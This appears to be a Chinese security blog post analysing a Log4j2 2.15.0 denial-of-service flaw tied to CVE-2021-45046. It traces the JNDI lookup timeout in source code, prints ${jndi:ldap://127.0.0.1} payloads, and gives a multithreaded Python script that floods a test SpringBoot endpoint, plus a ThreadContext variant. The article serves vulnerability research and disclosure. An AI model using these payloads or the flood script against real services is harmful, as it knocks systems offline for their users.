Apache Log4j2拒绝服务漏洞分析

简介: Apache Log4j2拒绝服务漏洞分析

介绍

在Log4j2爆出RCE漏洞后,官方给出了RC1和RC2的修复,在之前的文章中有详细分析

在RC2的修复之前,其实就存在DOS的可能,但我在RC2的修复后,发现仍然可以造成拒绝服务漏洞

于是在RC2修复补丁发布后几小时内向Apache Logging PMC报告了该问题

d7756920e12f34b799f70f2a991cb362_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

得到了官方的认可和致谢

726763cf3489791f182e10172290632c_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg

其实当时没有想过申请CVE等步骤,但在今天早上看到了Log4j2发布了CVE-2021-45046漏洞报告,这个CVE正是拒绝服务相关,不过漏洞credit信息并不是我,而是国外某团队

087b749ee8ecb87a136ddfd7a5b39673_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

具体链接参考:

https://logging.apache.org/log4j/2.x/security.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046


大致阅读CVE-2021-45046相关的信息后,发现和我提交的DOS漏洞略有不同,但核心部分是一致的


在2.15.0版本利用的前提:该漏洞必须在开启lookup功能的情况下触发

一种常见的开启姿势是在log4j2.xml中:

<appenders>
   <console name="CONSOLE-APPENDER" target="SYSTEM_OUT">
       <PatternLayout pattern="%msg{lookups}%n"/>
   </console>
</appenders>



这篇文章就从三个方面来谈一谈这个拒绝服务漏洞

  • 我是如何发现这个拒绝服务漏洞的
  • 这个CVE描述的漏洞与我发现的有什么相同和不同之处
  • 这种拒绝服务漏洞的实际利用场景


挖掘过程

回顾RC1和RC2的修复:如果存在JndiLookup那么会判断其中的的host是否合法

if (!allowedHosts.contains(uri.getHost())) {
   LOGGER.warn("Attempt to access ldap server not in allowed list");
   return null;
}


而allowedHosts中一定包含有localhost和127.0.0.1

// 拿到本地IP
private static final List<String> permanentAllowedHosts = NetUtils.getLocalIps();
...
addAll(hosts, allowedHosts, permanentAllowedHosts, ALLOWED_HOSTS, data);
return new JndiManager(...,allowedHosts,...);


这说明如果LDAP服务端在127.0.0.1可以成功lookup

然而黑客不可能凭空在服务端本地开启一个恶意的LDAP Server

我想到lookup本质是网络相关的操作,会有阻塞的可能。可以构造出Payload使程序lookup本地,而本地不可能开LDAP Server,于是发生超时等待,也许会有拒绝服务漏洞的可能

于是修改了RC2的源码,加入了统计时间代码,分析lookup的超时情况

(下文分析为什么阻塞的方法不是looup而是context.getAttributes)

if (!allowedHosts.contains(uri.getHost())) {
   LOGGER.warn("Attempt to access ldap server not in allowed list");
   return null;
}
long startTime = System.currentTimeMillis();
Attributes attributes = null;
try {
   // 阻塞方法
   attributes = this.context.getAttributes(name);
}catch (Exception ignored){
}
long endTime = System.currentTimeMillis();
System.out.println(endTime-startTime);


测试以上打印时间的代码会发现总是打印2000左右,说明超时时间为2秒


深入getAttributes可以看到这样的方法

static ResolveResult getUsingURLIgnoreRootDN(String var0, Hashtable<?, ?> var1) throws NamingException {
   LdapURL var2 = new LdapURL(var0);
   // 跟入
   LdapCtx var3 = new LdapCtx("", var2.getHost(), var2.getPort(), var1, var2.useSsl());
   String var4 = var2.getDN() != null ? var2.getDN() : "";
   CompositeName var5 = new CompositeName();
   if (!"".equals(var4)) {
       var5.add(var4);
  }
   return new ResolveResult(var3, var5);
}


在new LdapCtx方法中存在connect操作导致阻塞

(其实connect方法还有几步才会到达最底层的阻塞,不过没有必要继续分析了)

public LdapCtx(String var1, String var2, int var3, Hashtable<?, ?> var4, boolean var5) throws NamingException {
  ...
   try {
       this.connect(false);
  }
  ...
}

回到之前的问题:为什么阻塞的不是lookup而是getAttributes方法

当前代码在连接超时后会抛出异常,走不到lookup方法

7b9b47457911e3b10f647a91aa0098ec_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


其实在lookup方法中应该也会造成阻塞,简单往里面跟一下会发现类似的代码

// 从Attributes里获取属性
// 那么应该调用了getAttributes之类的阻塞方法
if (((Attributes)var4).get(Obj.JAVA_ATTRIBUTES[2]) != null) {
   var3 = Obj.decodeObject((Attributes)var4);
}
if (var3 == null) {
   // 类似的代码
   var3 = new LdapCtx(this, this.fullyQualifiedName(var1));
}


现在发现了能让程序阻塞的办法,那么怎样构造Payload以达成更长时间的阻塞呢

Log4j2在处理${}是递归解析,也就是说会处理一个字符串中的所有${}并分别处理对应的值,每一次的处理都会造成2秒的等待,所以只需简单的拼接即可

private int substitute(final LogEvent event, final StringBuilder buf, final int offset, final int length,
                      List<String> priorVariables) {
  ...
   substitute(event, bufName, 0, bufName.length());
  ...
   String varValue = resolveVariable(event, varName, buf, startPos, endPos);
  ...
   int change = substitute(event, buf, startPos, varLen, priorVariables);
}

例如我拼接三个会阻塞更长的时间

(这里是针对本地80端口,实际上可以用大概率关闭的高位端口)

${jndi:ldap://127.0.0.1}${jndi:ldap://127.0.0.1}${jndi:ldap://127.0.0.1}


这时候会有师傅产生疑问:

在一个web请求中,这样的payload只能让我当前的请求阻塞住,如何实现真正的拒绝服务攻击,让目标网站无法正常处理别人的请求呢?我将在后文给大家展示


利用场景

造一个SpringBoot项目,在resources下添加配置文件开启lookup功能

<configuration status="OFF" monitorInterval="30">
    <appenders>
        <console name="CONSOLE-APPENDER" target="SYSTEM_OUT">
            <PatternLayout pattern="%msg{lookups}%n"/>
        </console>
    </appenders>
    <loggers>
        <root level="error">
            <appender-ref ref="CONSOLE-APPENDER"/>
        </root>
    </loggers>
</configuration>


为了制造场景所以要移除了SpringBoot自带的日志依赖,而选用Log4j2

另外引入starter-web以编写Controller模拟真实的接口供测试

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter</artifactId>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.15.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.15.0</version>
</dependency>
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>


模拟一个接口:接受message参数并Base64解码后打印日志

@Controller
public class TestController {
    private static final Logger logger = LogManager.getLogger(TestController.class);
    @RequestMapping("/test")
    @ResponseBody
    public String test(String message) {
        try {
            // Base64解码
            String data = new String(Base64.getDecoder().decode(message));
            logger.error("message:" + data);
        } catch (Exception e) {
            return e.getMessage();
        }
        return "";
    }
}


使用Python编写EXP打自己的靶机

import base64
import threading
import requests
# 每一个Payload将会导致阻塞20秒
payload = "${jndi:ldap://127.0.0.1}" * 10
payload = base64.b64encode(bytes(payload, encoding="utf-8"))
url = "http://127.0.0.1:8080/test?message=" + str(payload, encoding="utf-8")
def work():
    requests.get(url)
if __name__ == '__main__':
    threadList = []
    # 多线程请求
    for i in range(1000):
        t = threading.Thread(target=work)
        threadList.append(t)
        t.start()
    for thread in threadList:
        thread.join()


启动SpringBoot项目后,可以用这个Python脚本成功造成拒绝服务漏洞


CVE分析

接下来分析这个CVE,其实我不确定对于这个CVE的解读是否正确

在Log4j2.xml中支持一种配置从上下文中取值:例如这个例子可以取到loginId值

<Appenders>
    <Console name="STDOUT" target="SYSTEM_OUT">
        <PatternLayout>
            <pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>
        </PatternLayout>
    </Console>
</Appenders>

如果程序这样写

public static void main(String[] args) throws Exception{
    ThreadContext.put("loginId","1}");
    logger.error("xxx");
}


将会打印

2021-12-15 12:03:53,860 ERROR Main [main] 1 xxx


如果代码这样写将会导致类似的拒绝服务

ThreadContext.put("loginId","${jndi:ldap://127.0.0.1}");
logger.error("xxx");


在xml中有另一种效果相同的配置方式,但这种写法反而不会触发${}解析

<Appenders>
    <Console name="STDOUT" target="SYSTEM_OUT">
        <PatternLayout>
            <pattern>%d %p %c{1.} [%t] %X{loginId} %m%n</pattern>
        </PatternLayout>
    </Console>
</Appenders>


在issue中也有人证实了这一点

cb12563fc17145ff5565e1fba8fa946e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


关于拒绝服务的分析上文已有,重点看一下ContextMapLookup

@Override
public String lookup(final String key) {
    return currentContextData().getValue(key);
}
@Override
public String lookup(final LogEvent event, final String key) {
    return event.getContextData().getValue(key);
}


这里的contextData正是一个简单的Map

58b2d610dcb7f2e68288390841097f5b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


在resolveVariable方法返回

protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,
                                 final int startPos, final int endPos) {
    final StrLookup resolver = getVariableResolver();
    if (resolver == null) {
        return null;
    }
    // 取出了${jndi:ldap://127.0.0.1}
    return resolver.lookup(event, variableName);
}


取出的payload在下一次的递归中成功被lookup

f948950b8bd6c97b5cde26d2905b4efc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


不难发现lookup时是从event中取Map那么该Map是如何保存到event中的呢

定位到创建LogEvent的方法ReusableLogEventFactory.createEvent

@Override
public LogEvent createEvent(final String loggerName, final Marker marker, final String fqcn,
                            final StackTraceElement location, final Level level, final Message message,
                            final List<Property> properties, final Throwable t) {
    if (result == null || result.reserved) {
        final boolean initThreadLocal = result == null;
        // 这个类中包含了空的context
        result = new MutableLogEvent();
        ...
    }
    ...
    // 真正设置context属性
    result.setContextData(injector.injectContextData(properties, (StringMap) result.getContextData()));
    result.setContextStack(ThreadContext.getDepth() == 0 ? ThreadContext.EMPTY_STACK : ThreadContext.cloneStack());
    ...
    return result;
}

跟入ThreadContextDataInjector.injectContextData方法

@Override
public StringMap injectContextData(final List<Property> props, final StringMap ignore) {
    if (providers.size() == 1 && (props == null || props.isEmpty())) {
        // 跟入supplyStringMap
        return providers.get(0).supplyStringMap();
    }
    ...
}


进入ThreadContextDataProvider.supplyStringMap方法

@Override
public StringMap supplyStringMap() {
    return ThreadContext.getThreadContextMap().getReadOnlyContextData();
}

在getReadOnlyContextData中获得这个Map

1ec42d975db72f45e4ae5bb00d211d57_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


再没有必要做进一步的分析了,这个拒绝服务漏洞原理已经清晰了


CVE利用场景

CVE中提到的利用场景应该更为广泛

通常情况下,记录登录用户的身份等信息是常见的操作

如果程序员选择了Log4j2这种ctx记录的方式而不是手动拼接字符串,将会导致该漏洞

@RequestMapping("/test")
@ResponseBody
public String test(String userId) {
    try {
        String id = new String(Base64.getDecoder().decode(userId));
        // 记录用户登录ID
        ThreadContext.put("loginId", id);
        // 记录该用户已登录
        logger.info("user login");
        // 其他业务逻辑
        // ...
    } catch (Exception e) {
        return e.getMessage();
    }
    return "";
}

正常情况下:http://localhost:8080/test?userId=MQ==

将会记录

2021-12-15 12:51:27,845 [http-nio-8080-exec-1] 1 user login


如果打Payload则报错并成功阻塞

http://localhost:8080/test?userId=JHtqbmRpOmxkYXA6Ly8xMjcuMC4wLjF9


改写下Python脚本即可成功拒绝服务

url = "http://127.0.0.1:8080/test?userId=" + str(payload, encoding="utf-8")


代码

SpringBoot搭建的利用环境代码:https://github.com/EmYiQing/Log4j2DoS

相关文章
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
831 1
|
8月前
|
Apache
web服务器(Apache)访问日志(access_log)详细解释
web服务器(Apache)访问日志(access_log)详细解释
|
安全 Java Shell
Apache Log4j2 远程代码执行漏洞
Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
115 2
|
存储 安全 Java
【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
829 0
|
安全 Java 大数据
CDH/HDP/CDP等大数据平台中如何快速应对LOG4J的JNDI系列漏洞
CDH/HDP/CDP等大数据平台中如何快速应对LOG4J的JNDI系列漏洞
|
2月前
|
XML 安全 Java
【日志框架整合】Slf4j、Log4j、Log4j2、Logback配置模板
本文介绍了Java日志框架的基本概念和使用方法,重点讨论了SLF4J、Log4j、Logback和Log4j2之间的关系及其性能对比。SLF4J作为一个日志抽象层,允许开发者使用统一的日志接口,而Log4j、Logback和Log4j2则是具体的日志实现框架。Log4j2在性能上优于Logback,推荐在新项目中使用。文章还详细说明了如何在Spring Boot项目中配置Log4j2和Logback,以及如何使用Lombok简化日志记录。最后,提供了一些日志配置的最佳实践,包括滚动日志、统一日志格式和提高日志性能的方法。
408 30
【日志框架整合】Slf4j、Log4j、Log4j2、Logback配置模板
|
21天前
|
监控 安全 Apache
什么是Apache日志?为什么Apache日志分析很重要?
Apache是全球广泛使用的Web服务器软件,支持超过30%的活跃网站。它通过接收和处理HTTP请求,与后端服务器通信,返回响应并记录日志,确保网页请求的快速准确处理。Apache日志分为访问日志和错误日志,对提升用户体验、保障安全及优化性能至关重要。EventLog Analyzer等工具可有效管理和分析这些日志,增强Web服务的安全性和可靠性。
|
3月前
|
XML JSON Java
Logback 与 log4j2 性能对比:谁才是日志框架的性能王者?
【10月更文挑战第5天】在Java开发中,日志框架是不可或缺的工具,它们帮助我们记录系统运行时的信息、警告和错误,对于开发人员来说至关重要。在众多日志框架中,Logback和log4j2以其卓越的性能和丰富的功能脱颖而出,成为开发者们的首选。本文将深入探讨Logback与log4j2在性能方面的对比,通过详细的分析和实例,帮助大家理解两者之间的性能差异,以便在实际项目中做出更明智的选择。
352 3
|
1月前
|
存储 监控 安全
什么是事件日志管理系统?事件日志管理系统有哪些用处?
事件日志管理系统是IT安全的重要工具,用于集中收集、分析和解释来自组织IT基础设施各组件的事件日志,如防火墙、路由器、交换机等,帮助提升网络安全、实现主动威胁检测和促进合规性。系统支持多种日志类型,包括Windows事件日志、Syslog日志和应用程序日志,通过实时监测、告警及可视化分析,为企业提供强大的安全保障。然而,实施过程中也面临数据量大、日志管理和分析复杂等挑战。EventLog Analyzer作为一款高效工具,不仅提供实时监测与告警、可视化分析和报告功能,还支持多种合规性报告,帮助企业克服挑战,提升网络安全水平。
|
3月前
|
存储 缓存 关系型数据库
MySQL事务日志-Redo Log工作原理分析
事务的隔离性和原子性分别通过锁和事务日志实现,而持久性则依赖于事务日志中的`Redo Log`。在MySQL中,`Redo Log`确保已提交事务的数据能持久保存,即使系统崩溃也能通过重做日志恢复数据。其工作原理是记录数据在内存中的更改,待事务提交时写入磁盘。此外,`Redo Log`采用简单的物理日志格式和高效的顺序IO,确保快速提交。通过不同的落盘策略,可在性能和安全性之间做出权衡。
1724 14

推荐镜像

更多